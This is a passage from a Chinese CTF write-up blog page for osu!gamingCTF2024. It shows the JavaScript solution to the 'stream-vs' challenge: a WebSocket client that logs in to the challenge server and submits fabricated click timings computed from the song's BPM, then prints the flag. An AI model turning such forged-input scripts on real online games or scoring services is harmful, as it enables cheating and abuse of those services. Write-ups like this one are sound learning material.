class="keyword">new</span> <span class="title class_">WebSocket</span>(<span class="string">&#x27;wss://stream-vs.web.osugaming.lol&#x27;</span>);</span><br><span class="line"><span class="keyword">let</span> clicks = <span class="keyword">new</span> <span class="title class_">Set</span>();</span><br><span class="line"></span><br><span class="line">ws.<span class="property">onopen</span> = <span class="function">() =&gt;</span> &#123;</span><br><span class="line">  ws.<span class="title function_">send</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123; <span class="attr">type</span>: <span class="string">&quot;login&quot;</span>, <span class="attr">data</span>: <span class="string">&quot;admin4&quot;</span> &#125;));</span><br><span class="line">  ws.<span class="title function_">send</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123; <span class="attr">type</span>: <span class="string">&quot;challenge&quot;</span> &#125;));</span><br><span class="line">  ws.<span class="title function_">send</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123; <span class="attr">type</span>: <span class="string">&quot;start&quot;</span> &#125;));</span><br><span class="line">&#125;;</span><br><span class="line">ws.<span class="property">onmessage</span> = <span class="function"><span class="params">e</span> =&gt;</span> &#123;</span><br><span class="line">	<span class="keyword">const</span> &#123; type, data &#125; = <span class="title class_">JSON</span>.<span class="title function_">parse</span>(e.<span class="property">data</span>);</span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(data);</span><br><span class="line">	<span class="title function_">run</span>(data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">run</span> = <span class="keyword">async</span> (<span class="params">session</span>) =&gt; &#123;</span><br><span class="line">	<span class="keyword">let</span> bmp = session.<span class="property">songs</span>[session.<span class="property">round</span>].<span class="property">bpm</span>; </span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;bmp = &quot;</span>+bmp);</span><br><span class="line">    clicks.<span class="title function_">clear</span>();</span><br><span class="line">    <span class="keyword">let</span> start = +<span class="keyword">new</span> <span class="title class_">Date</span>();</span><br><span class="line">    recording = <span class="literal">true</span>;</span><br><span class="line">	<span class="keyword">let</span> click_data = performance.<span class="title function_">now</span>();</span><br><span class="line">    <span class="keyword">let</span> end = start + session.<span class="property">songs</span>[session.<span class="property">round</span>].<span class="property">duration</span> * <span class="number">1000</span>;</span><br><span class="line">    </span><br><span class="line">	<span class="keyword">let</span> times = end - start;</span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;times = &quot;</span>+times);</span><br><span class="line">	<span class="keyword">let</span> cnt = <span class="title class_">Math</span>.<span class="title function_">round</span>(bmp * <span class="number">4</span> /<span class="number">60000</span> * times); </span><br><span class="line">	<span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;cnt = &quot;</span>+cnt);</span><br><span class="line">	<span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">0</span>;i&lt;=cnt; i++)</span><br><span class="line">	&#123;</span><br><span class="line">		clicks.<span class="title function_">add</span>(click_data+<span class="number">0.00999998808</span>);</span><br><span class="line">	&#125;</span><br><span class="line">    recording = <span class="literal">false</span>;</span><br><span class="line">    ws.<span class="title function_">send</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123; <span class="attr">type</span>: <span class="string">&quot;results&quot;</span>, <span class="attr">data</span>: &#123; <span class="attr">clicks</span>: [...clicks], start, end &#125; &#125;));</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>run了之后在控制台看见flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">osu&#123;are_y0u_a_r0b0t?&#125;</span><br></pre></td></tr></table></figure>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#mikufanpage-490-solves-104-points"><span class="toc-number">1.</span> <span class="toc-text">mikufanpage(490 solves &#x2F; 104 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#when-you-dont-see-it-235-solves-111-points"><span class="toc-number">2.</span> <span class="toc-text">when-you-dont-see-it(235 solves &#x2F; 111 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#profile-page-190-solves-114-points"><span class="toc-number">3.</span> <span class="toc-text">profile-page(190 solves &#x2F; 114 points)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#stream-vs-79-solves-138-points"><span class="toc-number">4.</span> <span class="toc-text">stream-vs(79 solves &#x2F; 138 points)</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/07/14/osu-gamingCTF2024-wp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&text=osu!gamingCTF2024 wp"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&is_video=false&description=osu!gamingCTF2024 wp"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=osu!gamingCTF2024 wp&body=Check out this article: http://example.com/2024/07/14/osu-gamingCTF2024-wp/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&title=osu!gamingCTF2024 wp"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&name=osu!gamingCTF2024 wp&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/07/14/osu-gamingCTF2024-wp/&t=osu!gamingCTF2024 wp"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    oSthing
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/oSthing">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
